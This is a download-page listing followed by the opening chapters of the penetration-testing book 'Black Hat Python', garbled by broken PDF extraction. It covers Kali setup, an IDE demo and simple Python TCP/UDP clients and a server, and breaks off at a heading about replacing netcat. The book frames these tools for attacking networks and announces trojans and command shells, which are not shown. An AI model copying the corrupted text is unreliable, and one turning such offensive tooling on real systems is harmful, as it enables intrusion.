Justin Seitz - Black Hat Python-Python Programming for Hackers and Pentesters

До загрузки: 30 сек.



Благодарим, что скачиваете у нас :)

Если, что - то:

  • Поделится ссылкой:
  • Документ найден в свободном доступе.
  • Загрузка документа - бесплатна.
  • Если нарушены ваши права, свяжитесь с нами.
Формат: pdf
Найдено: 13.07.2020
Добавлено: 30.09.2020
Размер: 3.17 Мб

Bla ck H at P yth on : P yth on P ro g ra m min g f o r
Hack ers a n d P en te ste rs
Ju stin S eit z
Publis h ed b y
No S ta rc h P re ss

To P at
Alt h ough w e n ever m et, I a m f o re ver g ra te fu l f o r e very m em ber o f y our w onderfu l f a m ily y ou g ave m e.
Canadia n C ancer S ocie ty
www.c a ncer.c a

Abou t t h e A uth or
Ju sti n S eitz i s a s e nio r s e curity r e se arc her f o r I m munity , I n c., w here h e s p end s h is ti m e b ug h unti n g,
re v ers e e ngin eerin g, w riti n g e xp lo its , a nd c o din g P yth o n. H e i s th e a uth o r o f
Gra y H at P yth on
, th e
fir s t b ook to c o ver P yth o n f o r s e curity a naly sis .

Abou t t h e T ech nic a l R ev ie w ers
Dan F ris c h h as o ver te n y ears o f e xp erie nce i n i n fo rm ati o n s e curity . C urre ntl y , h e i s a s e nio r s e curity
analy st i n a C anad ia n l a w e nfo rc em ent a gency. P rio r to th at r o le , h e w ork ed a s a c o nsu lta nt p ro vid in g
se curity a sse ssm ents to f in ancia l a nd te chno lo gy f ir m s i n N orth A meric a. B ecause h e i s o bse sse d w ith
te chno lo gy a nd h o ld s a 3 rd d egre e b la ck b elt, y o u c an a ssu m e ( c o rre ctl y ) th at h is e nti r e l ife i s b ase d
aro und
The M atr ix
.
Sin ce th e e arly d ays o f C om modore P E T a nd V IC -2 0, te chno lo gy h as b een a c o nsta nt c o m panio n ( a nd
so m eti m es a n o bse ssio n!) to C liff J a nze n. C liff d is c o vere d h is c are er p assio n w hen h e m oved to
in fo rm ati o n s e curity i n 2 008 a fte r a d ecad e o f I T o pera ti o ns. F or th e p ast f e w y ears C liff h as b een
hap pily e m plo yed a s a s e curity c o nsu lta nt, d oin g e v ery th in g f r o m p olic y r e v ie w to p enetr a ti o n te sts ,
and h e f e els l u cky to h av e a c are er th at i s a ls o h is f a v orite h o bby.

Fore w ord
Pyth o n i s s ti ll th e d om in ant l a nguage i n th e w orld o f i n fo rm ati o n s e curity , e v en i f th e c o nv ers a ti o n
ab out y o ur l a nguage o f c ho ic e s o m eti m es l o oks m ore l ik e a r e lig io us w ar. P yth o n-b ase d to ols i n clu d e
all m anner o f f u zze rs , p ro xie s, a nd e v en th e o ccasio nal e xp lo it. E xp lo it f r a m ew ork s l ik e C A NVA S
are w ritte n i n P yth o n a s a re m ore o bsc ure to ols l ik e P yE m u o r S ulle y.
Ju st a b out e v ery f u zze r o r e xp lo it I h av e w ritte n h as b een i n P yth o n. I n f a ct, th e a uto m oti v e h ackin g
re se arc h th at C hris V ala se k a nd I r e centl y p erfo rm ed c o nta in ed a l ib ra ry to i n je ct C A N m essa ges o nto
yo ur a uto m oti v e n etw ork u sin g P yth o n!
If y o u a re i n te re ste d i n ti n kerin g w ith i n fo rm ati o n s e curity ta sk s, P yth o n i s a g re at l a nguage to l e arn
because o f th e l a rg e n um ber o f r e v ers e e ngin eerin g a nd e xp lo ita ti o n l ib ra rie s a v aila b le f o r y o ur u se .
Now i f o nly th e M eta sp lo it d ev elo pers w ould c o m e to th eir s e nse s a nd s w itc h f r o m R ub y to P yth o n,
our c o m munity w ould b e u nite d .
In th is n ew b ook, J u sti n c o vers a l a rg e r a nge o f to pic s th at a n e nte rp ris in g y o ung h acker w ould n eed
to g et o ff th e g ro und . H e i n clu d es w alk th ro ughs o f h o w to r e ad a nd w rite n etw ork p ackets , h o w to
sn iff th e n etw ork , a s w ell a s a nyth in g y o u m ig ht n eed f o r w eb a p plic ati o n a ud iti n g a nd a tta ckin g. H e
th en s p end s s ig nific ant ti m e d iv in g i n to h o w to w rite c o de to a d dre ss s p ecific s w ith a tta ckin g
Win d ow s s y ste m s. I n g enera l,
Bla ck H at P yth on
i s a f u n r e ad , a nd w hile i t m ig ht n o t tu rn y o u i n to a
su p er s tu nt h acker l ik e m yse lf, i t c an c erta in ly g et y o u s ta rte d d ow n th e p ath . R em em ber, th e
diffe re nce b etw een s c rip t k id die s a nd p ro fe ssio nals i s th e d iffe re nce b etw een m ere ly u sin g o th er
peo ple ’s to ols a nd w riti n g y o ur o w n.
Charlie M ille r
St. L ouis , M is so uri
Sep te m ber 2 014

Pre fa ce
Pyth o n h acker. T ho se a re tw o w ord s y o u r e ally c o uld u se to d esc rib e m e. A t I m munity , I a m l u cky
eno ugh to w ork w ith p eo ple w ho a ctu ally , r e ally , k no w h o w to c o de P yth o n. I a m n o t o ne o f th o se
peo ple . I s p end a g re at d eal o f m y ti m e p enetr a ti o n te sti n g, a nd th at r e q uir e s r a p id P yth o n to ol
dev elo pm ent, w ith a f o cus o n e xecuti o n a nd d eliv erin g r e su lts ( n o t n ecessa rily o n p re tti n ess,
opti m iz a ti o n, o r e v en s ta b ility ). T hro ugho ut th is b ook y o u w ill l e arn th at th is i s h o w I c o de, b ut I a ls o
fe el a s th o ugh i t i s p art o f w hat m akes m e a s tr o ng p ente ste r. I h o pe th at th is p hilo so phy a nd s ty le
help s y o u a s w ell.
As y o u p ro gre ss th ro ugh th e b ook, y o u w ill a ls o r e aliz e th at I d on’t ta ke d eep d iv es o n a ny s in gle
to pic . T his i s b y d esig n. I w ant to g iv e y o u th e b are m in im um , w ith a l ittl e f la v or, s o th at y o u h av e
so m e f o und ati o nal k no w le d ge. W ith th at i n m in d , I ’ v e s p rin kle d i d eas a nd h o m ew ork a ssig nm ents
th ro ugho ut th e b ook to k ic ksta rt y o u i n y o ur o w n d ir e cti o n. I e nco ura ge y o u to e xp lo re th ese i d eas, a nd
I w ould l o ve to h ear b ack a ny o f y o ur o w n i m ple m enta ti o ns, to olin g, o r h o m ew ork a ssig nm ents th at
yo u h av e d one.
As w ith a ny te chnic al b ook, r e ad ers a t d iffe re nt s k ill l e v els w ith P yth o n ( o r i n fo rm ati o n s e curity i n
genera l) w ill e xp erie nce th is b ook d iffe re ntl y . S om e o f y o u m ay s im ply g ra b i t a nd n ab c hap te rs th at
are p erti n ent to a c o nsu lti n g g ig y o u a re o n, w hile o th ers m ay r e ad i t c o ver to c o ver. I w ould
re co m mend th at i f y o u a re a n o vic e to i n te rm ed ia te P yth o n p ro gra m mer th at y o u s ta rt a t th e b egin nin g
of th e b ook a nd r e ad i t s tr a ig ht th ro ugh i n o rd er. Y ou w ill p ic k u p s o m e g o od b uild in g b lo cks a lo ng
th e w ay.
To s ta rt, I l a y d ow n s o m e n etw ork in g f u nd am enta ls i n
Chap te r 2
a nd s lo w ly w ork o ur w ay th ro ugh
ra w s o ckets i n
Chap te r 3
a nd u sin g S cap y i n
Chap te r 4
f o r s o m e m ore i n te re sti n g n etw ork to olin g.
The n ext s e cti o n o f th e b ook d eals w ith h ackin g w eb a p plic ati o ns, s ta rti n g w ith y o ur o w n c usto m
to olin g i n
Chap te r 5
a nd th en e xte nd in g th e p opula r B urp S uite i n
Chap te r 6
. F ro m th ere w e w ill
sp end a g re at d eal o f ti m e ta lk in g a b out tr o ja ns, s ta rti n g w ith G itH ub c o m mand a nd c o ntr o l i n
Chap te r 7
, a ll th e w ay th ro ugh
Chap te r 1 0
w here w e w ill c o ver s o m e W in d ow s p riv ile ge e sc ala ti o n
tr ic ks. T he f in al c hap te r i s a b out u sin g V ola ti lity f o r a uto m ati n g s o m e o ffe nsiv e m em ory f o re nsic s
te chniq ues.
I tr y to k eep th e c o de s a m ple s s h o rt a nd to th e p oin t, a nd th e s a m e g o es f o r th e e xp la nati o ns. I f y o u a re
re la ti v ely n ew to P yth o n I e nco ura ge y o u to p unch o ut e v ery l in e to g et th at c o din g m usc le m em ory
go in g. A ll o f th e s o urc e c o de e xam ple s f r o m th is b ook a re a v aila b le a t
http ://n osta rc h .c o m /b la ckh atp yth on/
.
Here w e g o !

Ack now le d gm en ts
I w ould l ik e to th ank m y f a m ily — m y b eauti fu l w ife , C la re , a nd m y f iv e c hild re n, E m ily , C arte r,
Cohen, B ra d y, a nd M aso n — f o r a ll o f th e e nco ura gem ent a nd to le ra nce w hile I s p ent a y ear a nd a
half o f m y l ife w riti n g th is b ook. M y b ro th ers , s is te r, M om , D ad , a nd P aule tte h av e a ls o g iv en m e a
lo t o f m oti v ati o n to k eep p ush in g th ro ugh n o m atte r w hat. I l o ve y o u a ll.
To a ll m y f o lk s a t I m munity ( I w ould l is t e ach o f y o u h ere i f I h ad th e r o om ): th anks f o r to le ra ti n g m e
on a d ay-to -d ay b asis . Y ou a re tr u ly a n a m azin g c re w to w ork w ith . T o th e te am a t N o S ta rc h — T yle r,
Bill, S ere na, a nd L eig h — th anks s o m uch f o r a ll o f th e h ard w ork y o u p ut i n to th is b ook a nd th e r e st
in y o ur c o lle cti o n. W e a ll a p pre cia te i t.
I w ould a ls o l ik e to th ank m y te chnic al r e v ie w ers , D an F ris c h a nd C liff J a nze n. T hese g uys ty p ed o ut
and c riti q ued e v ery s in gle l in e o f c o de, w ro te s u p porti n g c o de, m ad e e d its , a nd p ro vid ed a b so lu te ly
am azin g s u p port th ro ugho ut th e w ho le p ro cess. A nyo ne w ho i s w riti n g a n i n fo se c b ook s h o uld r e ally
get th ese g uys o n b oard ; th ey w ere a m azin g a nd th en s o m e.
For th e r e st o f y o u r u ffia ns th at s h are d rin ks, l a ughs a nd G Chats : th anks f o r l e tti n g m e p is s a nd m oan
to y o u a b out w riti n g th is b ook.

Chap te r 1 . S ettin g U p Y ou r P yth on
Envir o n m en t
This i s th e l e ast f u n — b ut n ev erth ele ss c riti c al — p art o f th e b ook, w here w e w alk th ro ugh s e tti n g u p
an e nv ir o nm ent i n w hic h to w rite a nd te st P yth o n. W e a re g o in g to d o a c ra sh c o urs e i n s e tti n g u p a
Kali L in ux v ir tu al m achin e ( V M ) a nd i n sta llin g a n ic e I D E s o th at y o u h av e e v ery th in g y o u n eed to
dev elo p c o de. B y th e e nd o f th is c hap te r, y o u s h o uld b e r e ad y to ta ckle th e e xerc is e s a nd c o de
exam ple s i n th e r e m ain d er o f th e b ook.
Befo re y o u g et s ta rte d , g o a head a nd d ow nlo ad a nd i n sta ll V M Ware P la yer.
[ 1 ]
I a ls o r e co m mend th at
yo u h av e s o m e W in d ow s V M s a t th e r e ad y a s w ell, i n clu d in g W in d ow s X P a nd W in d ow s 7 ,
pre fe ra b ly 3 2-b it i n b oth c ase s.

In sta llin g K ali L in ux
Kali i s th e s u ccesso r to th e B ackT ra ck L in ux d is tr ib uti o n, d esig ned b y O ffe nsiv e S ecurity f r o m th e
gro und u p a s a p enetr a ti o n te sti n g o pera ti n g s y ste m . I t c o m es w ith a n um ber o f to ols p re in sta lle d a nd
is b ase d o n D eb ia n L in ux, s o y o u’ll a ls o b e a b le to i n sta ll a w id e v arie ty o f a d diti o nal to ols a nd
lib ra rie s b eyo nd w hat’ s o n th e O S to s ta rt.
Fir s t, g ra b a K ali V M i m age f r o m th e f o llo w in g U RL:
http ://im ages.o ffe n siv e-s e cu rity .c o m /k a li-
lin ux-1 .0 .9 -v m -i4 86.7 z
. [ 2 ]
D ow nlo ad a nd d eco m pre ss th e i m age, a nd th en d oub le -c lic k i t to m ake
VM Ware P la yer f ir e i t u p . T he d efa ult u se rn am e i s
ro ot
a nd th e p assw ord i s
to or
. T his s h o uld g et y o u
in to th e f u ll K ali d esk to p e nv ir o nm ent a s s h o w n i n
Fig ure 1 -1
.
Fig ure 1 -1 . T he K ali L in ux d esk to p
The f ir s t th in g w e a re g o in g to d o i s e nsu re th at th e c o rre ct v ers io n o f P yth o n i s i n sta lle d . T his b ook
will u se P yth o n 2 .7 th ro ugho ut. I n th e s h ell (
Applic a tio ns
▸ Acce sso rie s
▸ Term in al
), e xecute th e
fo llo w in g:
root@kali:~#
python --version
Python 2.7.3
root@kali:~#
If y o u d ow nlo ad ed th e e xact i m age th at I r e co m mend ed a b ove, P yth o n 2 .7 w ill b e a uto m ati c ally
in sta lle d . P le ase n o te th at u sin g a d iffe re nt v ers io n o f P yth o n m ig ht b re ak s o m e o f th e c o de e xam ple s
in th is b ook. Y ou h av e b een w arn ed .

Now l e t’ s a d d s o m e u se fu l p ie ces o f P yth o n p ackage m anagem ent i n th e f o rm o f
easy_install
a nd
pip
. T hese a re m uch l ik e th e
apt
p ackage m anager b ecause th ey a llo w y o u to d ir e ctl y i n sta ll P yth o n
lib ra rie s, w ith o ut h av in g to m anually d ow nlo ad , u np ack, a nd i n sta ll th em . L et’ s i n sta ll b oth o f th ese
package m anagers b y i s su in g th e f o llo w in g c o m mand s:
root@kali:~#:
apt-get install python-setuptools python-pip
When th e p ackages a re i n sta lle d , w e c an d o a q uic k te st a nd i n sta ll th e m odule th at w e’ll u se i n
Chap te r 7
to b uild a G itH ub -b ase d tr o ja n. E nte r th e f o llo w in g i n to y o ur te rm in al:
root@kali:~#:
pip install github3.py
You s h o uld s e e o utp ut i n y o ur te rm in al i n d ic ati n g th at th e l ib ra ry i s b ein g d ow nlo ad ed a nd i n sta lle d .
Then d ro p i n to a P yth o n s h ell a nd v alid ate th at i t w as i n sta lle d c o rre ctl y :
root@kali:~#:
python
Python 2.7.3 (default, Mar 14 2014, 11:57:14)
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
import github3
>>>
exit()
If y o ur r e su lts a re n o t i d enti c al to th ese , th en th ere i s a “ m is c o nfig ura ti o n” i n y o ur P yth o n e nv ir o nm ent
and y o u h av e b ro ught g re at s h am e to o ur P yth o n d ojo ! I n th is c ase , m ake s u re th at y o u f o llo w ed a ll th e
ste p s a b ove a nd th at y o u h av e th e c o rre ct v ers io n o f K ali.
Keep i n m in d th at f o r m ost e xam ple s th ro ugho ut th is b ook, y o u c an d ev elo p y o ur c o de i n a v arie ty o f
env ir o nm ents , i n clu d in g M ac, L in ux, a nd W in d ow s. T here a re s o m e c hap te rs th at a re W in d ow s-
sp ecific , a nd I ’ ll m ake s u re to l e t y o u k no w a t th e b egin nin g o f th e c hap te r.
Now th at w e h av e o ur h ackin g v ir tu al m achin e s e t u p , l e t’ s i n sta ll a P yth o n I D E f o r d ev elo pm ent.

Win gID E
While I ty p ic ally d on’t a d vocate c o m merc ia l s o ftw are p ro ducts , W in gID E i s th e b est I D E th at I ’ v e
use d i n th e p ast s e v en y ears a t I m munity . W in gID E p ro vid es a ll th e b asic I D E f u ncti o nality l ik e a uto -
co m ple ti o n a nd e xp la nati o n o f f u ncti o n p ara m ete rs , b ut i ts d eb uggin g c ap ab iliti e s a re w hat s e t i t
ap art
fr o m o th er I D Es. I w ill g iv e y o u a q uic k r u nd ow n o f th e c o m merc ia l v ers io n o f W in gID E, b ut o f
co urs e y o u s h o uld c ho ose w hic hev er v ers io n i s b est f o r y o u.
[ 3 ]
You c an g ra b W in gID E f r o m
http ://w ww.w in gw are .c o m /
, a nd I r e co m mend th at y o u i n sta ll th e tr ia l s o
th at y o u c an e xp erie nce f ir s th and s o m e o f th e f e atu re s a v aila b le i n th e c o m merc ia l v ers io n.
You c an d o y o ur d ev elo pm ent o n a ny p la tf o rm y o u w is h , b ut i t m ig ht b e b est to i n sta ll W in gID E o n
yo ur K ali V M a t l e ast to g et s ta rte d . I f y o u’v e f o llo w ed a lo ng w ith m y i n str u cti o ns s o f a r, m ake s u re
th at y o u d ow nlo ad th e 3 2-b it
.deb
p ackage f o r W in gID E, a nd s a v e i t to y o ur u se r d ir e cto ry . T hen
dro p i n to a te rm in al a nd r u n th e f o llo w in g:
root@kali:~#
dpkg -i wingide5_5.0.9-1_i386.deb
This s h o uld i n sta ll W in gID E a s p la nned . I f y o u g et a ny i n sta lla ti o n e rro rs , th ere m ig ht b e u nm et
dep end encie s. I n th is c ase , s im ply r u n:
root@kali:~#
apt-get -f install
This s h o uld f ix a ny m is sin g d ep end encie s a nd i n sta ll W in gID E. T o v erify th at y o u’v e i n sta lle d i t
pro perly , m ake s u re y o u c an a ccess i t a s s h o w n i n
Fig ure 1 -2
.

Fig ure 1 -2 . A ccessin g W in gID E f ro m th e K ali d esk to p
Fir e u p W in gID E a nd o pen a n ew , b la nk P yth o n f ile . T hen f o llo w a lo ng a s I g iv e y o u a q uic k r u nd ow n
of s o m e u se fu l f e atu re s. F or s ta rte rs , y o ur s c re en s h o uld l o ok l ik e
Fig ure 1 -3
, w ith y o ur m ain c o de
ed iti n g a re a i n th e to p l e ft a nd a s e t o f ta b s o n th e b otto m .

Fig ure 1 -3 . M ain W in gID E w in dow la yo ut
Let’ s w rite s o m e s im ple c o de to i llu str a te s o m e o f th e u se fu l f u ncti o ns o f W in gID E, i n clu d in g th e
Deb ug P ro be a nd S ta ck D ata ta b s. P unch th e f o llo w in g c o de i n to th e e d ito r:
def sum(number_one,number_two):
number_one_int = convert_integer(number_one)
number_two_int = convert_integer(number_two)
result = number_one_int + number_two_int
return result
def convert_integer(number_string):
converted_integer = int(number_string)
return converted_integer
answer = sum("1","2")
This i s a v ery c o ntr iv ed e xam ple , b ut i t i s a n e xcelle nt d em onstr a ti o n o f h o w to m ake y o ur l ife e asy
with W in gID E. S av e i t w ith a ny f ile nam e y o u w ant, c lic k th e
Debug
m enu i te m , a nd s e le ct th e
Sele ct
Curre nt a s M ain D ebug F ile
o pti o n, a s s h o w n i n
Fig ure 1 -4
.

Fig ure 1 -4 . S ettin g th e c u rre n t P yth on s c rip t f o r d eb uggin g
Now s e t a b re akp oin t o n th e l in e o f c o de th at s a ys:
return converted_integer
You c an d o th is b y c lic kin g i n th e l e ft m arg in o r b y h itti n g th e F 9 k ey. Y ou s h o uld s e e a l ittl e r e d d ot
ap pear i n th e m arg in . N ow r u n th e s c rip t b y p re ssin g F 5, a nd e xecuti o n s h o uld h alt a t y o ur b re akp oin t.
Clic k th e
Sta ck D ata
ta b a nd y o u s h o uld s e e a s c re en l ik e th e o ne i n
Fig ure 1 -5
.
The S ta ck D ata ta b i s g o in g to s h o w u s s o m e u se fu l i n fo rm ati o n s u ch a s th e s ta te o f a ny l o cal a nd
glo bal v aria b le s a t th e m om ent th at o ur b re akp oin t w as h it. T his a llo w s y o u to d eb ug m ore a d vanced
co de w here y o u n eed to i n sp ect v aria b le s d urin g e xecuti o n to tr a ck d ow n b ugs. I f y o u c lic k th e d ro p-
dow n b ar, y o u c an a ls o s e e th e c urre nt c all s ta ck, w hic h te lls y o u w hic h f u ncti o n c alle d th e f u ncti o n
yo u a re c urre ntl y i n sid e. H av e a l o ok a t
Fig ure 1 -6
to s e e th e s ta ck tr a ce.

Fig ure 1 -5 . V ie w in g s ta ck d ata a fte r a b re a kpoin t h it

Fig ure 1 -6 . V ie w in g th e c u rre n t s ta ck tr a ce
We c an s e e th at
convert_integer
w as c alle d f r o m th e
sum
f u ncti o n o n l in e 3 o f o ur P yth o n s c rip t.
This b eco m es v ery u se fu l i f y o u h av e r e curs iv e f u ncti o n c alls o r a f u ncti o n th at i s c alle d f r o m m any
pote nti a l p la ces. U sin g th e S ta ck D ata ta b w ill c o m e i n v ery h and y i n y o ur P yth o n d ev elo pin g c are er!
The n ext m ajo r f e atu re i s th e D eb ug P ro be ta b . T his ta b e nab le s y o u to d ro p i n to a P yth o n s h ell th at i s
executi n g w ith in th e c urre nt c o nte xt o f th e e xact m om ent y o ur b re akp oin t w as h it. T his l e ts y o u i n sp ect
and m odify v aria b le s, a s w ell a s w rite l ittl e s n ip pets o f te st c o de to tr y o ut n ew i d eas o r to
tr o ub le sh o ot.
Fig ure 1 -7
d em onstr a te s h o w to i n sp ect th e
converted_integer
v aria b le a nd c hange
its v alu e.

Fig ure 1 -7 . U sin g D eb ug P ro be to in sp ect a nd m odif y lo ca l v a ria ble s
Afte r y o u m ake s o m e m odific ati o ns, y o u c an r e su m e e xecuti o n o f th e s c rip t b y p re ssin g F 5.
Even th o ugh th is i s a v ery s im ple e xam ple , i t d em onstr a te s s o m e o f th e m ost u se fu l f e atu re s o f
Win gID E f o r d ev elo pin g a nd d eb uggin g P yth o n s c rip ts .
[ 4 ]
That’ s a ll w e n eed i n o rd er to b egin d ev elo pin g c o de f o r th e r e st o f th is b ook. D on’t f o rg et a b out
makin g v ir tu al m achin es r e ad y a s ta rg et m achin es f o r th e W in d ow s-s p ecific c hap te rs , b ut o f c o urs e
usin g n ati v e h ard w are s h o uld n o t p re se nt a ny i s su es.
Now l e t’ s g et i n to s o m e a ctu al f u n!
[ 1 ]
You c an d ow nlo ad V M Ware P la yer f ro m
http ://w ww.v m ware .c o m /
.
[ 2 ]
For a “ c lic kable ” lis t o f th e lin ks in th is c hapte r, v is it
http ://n osta rc h .c o m /b la ck hatp yth on/
.
[ 3 ]
For a c om paris o n o f f e atu re s a m ong v ers io ns, v is it
http s://w in gw are .c o m /w in gid e/f e a tu re s/
.
[ 4 ]
If y ou a lr e ady u se a n I D E th at h as c om para ble f e atu re s to W in gID E, p le ase s e nd m e a n e m ail o r a tw eet b ecause I w ould lo ve to
hear a bout it !

Chap te r 2 . T he N etw ork : B asic s
The n etw ork i s a nd a lw ays w ill b e th e s e xie st a re na f o r a h acker. A n a tta cker c an d o a lm ost a nyth in g
with s im ple n etw ork a ccess, s u ch a s s c an f o r h o sts , i n je ct p ackets , s n iff d ata , r e m ote ly e xp lo it h o sts ,
and m uch m ore . B ut i f y o u a re a n a tta cker w ho h as w ork ed y o ur w ay i n to th e d eep est d ep th s o f a n
ente rp ris e ta rg et, y o u m ay f in d y o urs e lf i n a b it o f a c o nund ru m : y o u h av e n o to ols to e xecute n etw ork
atta cks. N o n etc at. N o W ir e sh ark . N o c o m pile r a nd n o m eans to i n sta ll o ne. H ow ev er, y o u m ig ht b e
su rp ris e d to f in d th at i n m any c ase s, y o u’ll f in d a P yth o n i n sta ll, a nd s o th at i s w here w e w ill b egin .
This c hap te r w ill g iv e y o u s o m e b asic s o n P yth o n n etw ork in g u sin g th e
socket
[ 5 ]
m odule . A lo ng th e
way, w e’ll b uild c lie nts , s e rv ers , a nd a T C P p ro xy; a nd th en tu rn th em i n to o ur v ery o w n n etc at,
co m ple te w ith c o m mand s h ell.
This c hap te r i s th e f o und ati o n f o r s u b se q uent c hap te rs i n w hic h w e
will b uild a h o st d is c o very to ol, i m ple m ent c ro ss-p la tf o rm s n iffe rs , a nd c re ate a r e m ote tr o ja n
fr a m ew ork . L et’ s g et s ta rte d .

Pyth on N etw ork in g i n a P ara gra p h
Pro gra m mers h av e a n um ber o f th ir d -p arty to ols to c re ate n etw ork ed s e rv ers a nd c lie nts i n P yth o n,
but th e c o re m odule f o r a ll o f th o se to ols i s
socket
. T his m odule e xp ose s a ll o f th e n ecessa ry p ie ces
to q uic kly w rite T C P a nd U D P c lie nts a nd s e rv ers , u se r a w s o ckets , a nd s o f o rth . F or th e p urp ose s o f
bre akin g i n o r m ain ta in in g a ccess to ta rg et m achin es, th is m odule i s a ll y o u r e ally n eed . L et’ s s ta rt b y
cre ati n g s o m e s im ple c lie nts a nd s e rv ers , th e tw o m ost c o m mon q uic k n etw ork s c rip ts y o u’ll w rite .

TC P C lie n t
There h av e b een c o untl e ss ti m es d urin g p enetr a ti o n te sts th at I ’ v e n eed ed to w hip u p a T C P c lie nt to
te st f o r s e rv ic es, s e nd g arb age d ata , f u zz, o r a ny n um ber o f o th er ta sk s. I f y o u a re w ork in g w ith in th e
co nfin es o f l a rg e e nte rp ris e e nv ir o nm ents , y o u w on’t h av e th e l u xury o f n etw ork in g to ols o r
co m pile rs , a nd s o m eti m es y o u’ll e v en b e m is sin g th e a b so lu te b asic s l ik e th e a b ility to c o py/p aste o r
an I n te rn et c o nnecti o n. T his i s w here b ein g a b le to q uic kly c re ate a T C P c lie nt c o m es i n e xtr e m ely
hand y. B ut e no ugh j a b berin g — l e t’ s g et c o din g. H ere i s a s im ple T C P c lie nt.
import socket
target_host = "www.google.com"
target_port = 80
# create a socket object
➊ client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect the client
➋ client.connect((target_host,target_port))
# send some data
➌ client.send("GET / HTTP/1.1\r\nHost: google.com\r\n\r\n")
# receive some data
➍ response = client.recv(4096)
print response
We f ir s t c re ate a s o cket o bje ct w ith th e
AF_INET
a nd
SOCK_STREAM
p ara m ete rs
➊ . T he
AF_INET
para m ete r i s s a yin g w e a re g o in g to u se a s ta nd ard I P v4 a d dre ss o r h o stn am e, a nd
SOCK_STREAM
in d ic ate s th at th is w ill b e a T C P
clie nt. W e th en c o nnect th e c lie nt to th e s e rv er
➋ a nd s e nd i t s o m e
data
➌ . T he l a st s te p i s to r e ceiv e s o m e d ata b ack a nd p rin t o ut th e r e sp onse
➍ . T his i s th e s im ple st
fo rm o f a T C P c lie nt, b ut th e o ne y o u w ill w rite m ost o fte n.
In th e a b ove c o de s n ip pet, w e a re m akin g s o m e s e rio us a ssu m pti o ns a b out s o ckets th at y o u d efin ite ly
want to b e a w are o f. T he f ir s t a ssu m pti o n i s th at o ur c o nnecti o n w ill a lw ays s u cceed , a nd th e s e co nd
is th at th e s e rv er i s a lw ays e xp ecti n g u s to s e nd d ata f ir s t ( a s o ppose d to s e rv ers th at e xp ect to s e nd
data to y o u f ir s t a nd a w ait y o ur r e sp onse ). O ur th ir d a ssu m pti o n i s th at th e s e rv er w ill a lw ays s e nd u s
data b ack i n a ti m ely f a sh io n. W e m ake th ese a ssu m pti o ns l a rg ely f o r s im plic ity ’s s a ke. W hile
pro gra m mers h av e v arie d o pin io ns a b out h o w to d eal w ith b lo ckin g s o ckets , e xcep ti o n-h and lin g i n
so ckets , a nd th e l ik e, i t’ s q uite r a re f o r p ente ste rs to b uild th ese n ic eti e s i n to th e q uic k-a nd -d ir ty to ols
fo r r e co n o r e xp lo ita ti o n w ork , s o w e’ll o m it th em i n th is c hap te r.

UDP C lie n t
A P yth o n U D P c lie nt i s n o t m uch d iffe re nt th an a T C P c lie nt; w e n eed to m ake o nly tw o s m all c hanges
to g et i t to s e nd p ackets i n U D P f o rm .
import socket
target_host = "127.0.0.1"
target_port = 80
# create a socket object
➊ client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# send some data
➋ client.sendto("AAABBBCCC",(target_host,target_port))
# receive some data
➌ data, addr = client.recvfrom(4096)
print data
As y o u c an s e e, w e c hange th e s o cket ty p e to
SOCK_DGRAM
➊ w hen c re ati n g th e s o cket o bje ct. T he
next s te p i s to s im ply c all
sendto()
➋ , p assin g i n th e d ata a nd th e s e rv er y o u w ant to s e nd th e d ata
to . B ecause U D P i s a c o nnecti o nle ss p ro to co l, th ere i s n o c all to
connect()
b efo re hand . T he l a st
ste p i s to c all
recvfrom()
➌ to r e ceiv e U D P d ata b ack. Y ou w ill a ls o n o ti c e th at i t r e tu rn s b oth th e
data a nd th e d eta ils o f th e r e m ote h o st a nd p ort.
Again , w e’re n o t l o okin g to b e s u p erio r n etw ork p ro gra m mers ; w e w ant to b e q uic k, e asy, a nd
re lia b le e no ugh to h and le o ur d ay-to -d ay h ackin g ta sk s. L et’ s m ove o n to c re ati n g s o m e s im ple
se rv ers .

TC P S erv er
Cre ati n g T C P s e rv ers i n P yth o n i s j u st a s e asy a s c re ati n g a c lie nt. Y ou m ig ht w ant to u se y o ur o w n
TC P s e rv er w hen w riti n g c o m mand s h ells o r c ra fti n g a p ro xy ( b oth o f w hic h w e’ll d o l a te r). L et’ s
sta rt b y c re ati n g a s ta nd ard m ulti - th re ad ed T C P s e rv er. C ra nk o ut th e c o de b elo w :
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
➊ server.bind((bind_ip,bind_port))
➋ server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
# this is our client-handling thread
➌ def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
# send back a packet
client_socket.send("ACK!")
client_socket.close()
while True:
➍ client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
➎ client_handler.start()
To s ta rt o ff, w e p ass i n th e I P a d dre ss a nd p ort w e w ant th e s e rv er to l is te n o n
➊ . N ext w e te ll th e
se rv er to s ta rt l is te nin g
➋ w ith a m axim um b acklo g o f c o nnecti o ns s e t to 5 . W e th en p ut th e s e rv er
in to i ts m ain l o op, w here i t i s w aiti n g f o r a n i n co m in g c o nnecti o n. W hen a c lie nt c o nnects
➍ , w e
re ceiv e th e c lie nt s o cket i n to th e
client
v aria b le , a nd th e r e m ote c o nnecti o n d eta ils i n to th e
addr
varia b le . W e th en c re ate a n ew th re ad o bje ct th at
poin ts to o ur
handle_client
f u ncti o n, a nd w e p ass
it th e c lie nt s o cket o bje ct a s a n a rg um ent. W e th en s ta rt th e th re ad to h and le th e c lie nt c o nnecti o n
➎ ,
and o ur m ain s e rv er l o op i s r e ad y to h and le a no th er i n co m in g c o nnecti o n. T he
handle_client

fu ncti o n p erfo rm s th e
recv()
a nd th en s e nd s a s im ple m essa ge b ack to th e c lie nt.
If y o u u se th e T C P c lie nt th at w e b uilt e arlie r, y o u c an s e nd s o m e te st p ackets to th e s e rv er a nd y o u
sh o uld s e e o utp ut l ik e th e f o llo w in g:
[*] Listening on 0.0.0.0:9999
[*] Accepted connection from: 127.0.0.1:62512
[*] Received: ABCDEF
That’ s i t! P re tty s im ple , b ut th is i s a v ery u se fu l p ie ce o f c o de w hic h w e w ill e xte nd i n th e n ext c o up le
of s e cti o ns w hen w e b uild a n etc at r e p la cem ent a nd a T C P p ro xy.

Rep la cin g N etc a t
